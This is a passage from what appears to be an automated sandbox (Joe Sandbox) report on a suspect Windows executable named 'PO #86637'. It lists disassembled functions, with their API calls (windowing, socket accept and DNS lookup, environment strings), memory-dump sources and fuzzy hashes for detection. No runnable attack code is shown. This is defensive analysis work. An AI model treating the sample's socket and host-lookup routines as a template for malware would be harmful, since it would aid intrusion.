                      • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                      Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __setmode$DebugOutputString_fprintf
                      • String ID:
                      • API String ID: 1792727568-0
                      • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                      • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                      • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                      • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                      Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                      • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$Long$AttributesLayered
                      • String ID:
                      • API String ID: 2169480361-0
                      • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                      • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                      • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                      • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                      Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                        • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                        • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                      • lstrlenW.KERNEL32(?), ref: 00434CF6
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                      • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: lstrcmpilstrcpylstrlen$_malloc
                      • String ID: cdecl
                      • API String ID: 3850814276-3896280584
                      • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                      • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                      • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                      • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                      Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                      • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                      • _memmove.LIBCMT ref: 0046D475
                      • inet_ntoa.WSOCK32(?), ref: 0046D481
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                      • String ID:
                      • API String ID: 2502553879-0
                      • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                      • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                      • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                      • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                      Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32 ref: 00448C69
                      • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                      • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                      • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$LongWindow
                      • String ID:
                      • API String ID: 312131281-0
                      • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                      • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                      • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                      • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                      Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                      Download Yara Rule
                      APIs
                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                      • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                      • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorLastacceptselect
                      • String ID:
                      • API String ID: 385091864-0
                      • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                      • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                      • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                      • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                      Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID:
                      • API String ID: 3850602802-0
                      • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                      • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                      • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                      • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                      Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                      Download Yara Rule
                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                      • GetStockObject.GDI32(00000011), ref: 00430258
                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                      • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$CreateMessageObjectSendShowStock
                      • String ID:
                      • API String ID: 1358664141-0
                      • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                      • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                      • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                      • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                      Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                      • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                      • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                      • String ID:
                      • API String ID: 2880819207-0
                      • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                      • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                      • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                      • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                      Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                      Download Yara Rule
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 00430BA2
                      • ScreenToClient.USER32(?,?), ref: 00430BC1
                      • ScreenToClient.USER32(?,?), ref: 00430BE2
                      • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ClientRectScreen$InvalidateWindow
                      • String ID:
                      • API String ID: 357397906-0
                      • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                      • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                      • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                      • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                      Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                      Download Yara Rule
                      APIs
                      • __wsplitpath.LIBCMT ref: 0043392E
                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                      • __wsplitpath.LIBCMT ref: 00433950
                      • __wcsicoll.LIBCMT ref: 00433974
                      • __wcsicoll.LIBCMT ref: 0043398A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                      • String ID:
                      • API String ID: 1187119602-0
                      • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                      • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                      • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                      • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                      Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcslen$_malloc_wcscat_wcscpy
                      • String ID:
                      • API String ID: 1597257046-0
                      • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                      • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                      • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                      • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                      Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                      Download Yara Rule
                      APIs
                      • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                      • __malloc_crt.LIBCMT ref: 0041F5B6
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: EnvironmentStrings$Free__malloc_crt
                      • String ID:
                      • API String ID: 237123855-0
                      • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                      • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                      • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                      • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                      Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: DeleteDestroyObject$IconWindow
                      • String ID:
                      • API String ID: 3349847261-0
                      • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                      • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                      • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                      • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                      Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                      Download Yara Rule
                      APIs
                      • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                      • String ID:
                      • API String ID: 2223660684-0
                      • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                      • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                      • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                      • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                      Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
